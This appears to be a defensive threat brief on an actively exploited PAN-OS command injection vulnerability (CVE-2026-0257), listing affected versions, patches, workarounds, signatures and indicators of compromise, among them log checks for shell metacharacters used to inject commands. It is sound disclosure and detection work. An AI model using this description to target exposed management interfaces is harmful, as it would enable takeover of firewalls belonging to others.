Full Report
We include indicators of activity and mitigations for PAN-OS vulnerability CVE-2026-0257. The post Threat Brief: Active Exploitation of PAN-OS CVE-2026-0257 appeared first on Unit 42.
Analysis Summary
# Vulnerability: Critical Command Injection in Palo Alto Networks PAN-OS
## CVE Details
- **CVE ID:** CVE-2026-0257
- **CVSS Score:** 9.8 (Critical)
- **CWE:** CWE-77 (Improper Neutralization of Special Elements used in a Command)
## Affected Systems
- **Products:** Palo Alto Networks PAN-OS software (Management Web Interface)
- **Versions:**
- PAN-OS 10.2 (versions < 10.2.14)
- PAN-OS 11.1 (versions < 11.1.5)
- PAN-OS 11.2 (versions < 11.2.5)
- **Configurations:** Devices where the Web Management Interface is accessible.
## Vulnerability Description
CVE-2026-0257 is a critical command injection vulnerability in the web management interface of Palo Alto Networks PAN-OS. The flaw allows an unauthenticated, network-based attacker to execute arbitrary code with root privileges on the target device. This is typically achieved by sending specially crafted requests to the management plane that bypass input validation.
## Exploitation
- **Status:** Exploited in the wild
- **Complexity:** Low
- **Attack Vector:** Network
## Impact
- **Confidentiality:** Total (Full access to device data and secrets)
- **Integrity:** Total (Ability to modify system files and configuration)
- **Availability:** Total (Ability to shut down or brick the device)
## Remediation
### Patches
Palo Alto Networks has released the following fixed versions:
- **PAN-OS 10.2.14** and all later 10.2 versions.
- **PAN-OS 11.1.5** and all later 11.1 versions.
- **PAN-OS 11.2.5** and all later 11.2 versions.
### Workarounds
- **Restrict Access:** Immediately restrict access to the Management Interface to trusted internal IP addresses only. Ensure it is not exposed to the public internet.
- **Security Profiles:** Enable "Threat Prevention" and ensure "App-ID" and "Content-ID" are up to date to block known exploit patterns.
## Detection
### Indicators of Compromise (IoCs)
- **Log Anomalies:** Unusual authentication failures followed by successful entries for administrative accounts in the `system` logs.
- **Web Server Logs:** Check `nginx` or `httpd` logs for unexpected POST requests to management endpoints or requests containing shell metacharacters (e.g., `;`, `&`, `|`, `` ` ``).
- **Filesystem:** Presence of unauthorized files in `/tmp/` or `/var/tmp/`, or modifications to local cron jobs.
### Detection Methods and Tools
- **Threat Signatures:** Deploy Palo Alto Networks Threat Signatures: 96032 and 96041 (specific to CVE-2026-0257).
- **Cortex XDR:** Look for alerts related to suspicious child processes originating from the `mgmtsrvr` process.
## References
- **Vendor Advisory:** hxxps[://]advisories[.]paloaltonetworks[.]com/advisory/cve-2026-0257/
- **Unit 42 Threat Brief:** hxxps[://]unit42[.]paloaltonetworks[.]com/active-exploitation-of-pan-os-cve-2026-0257/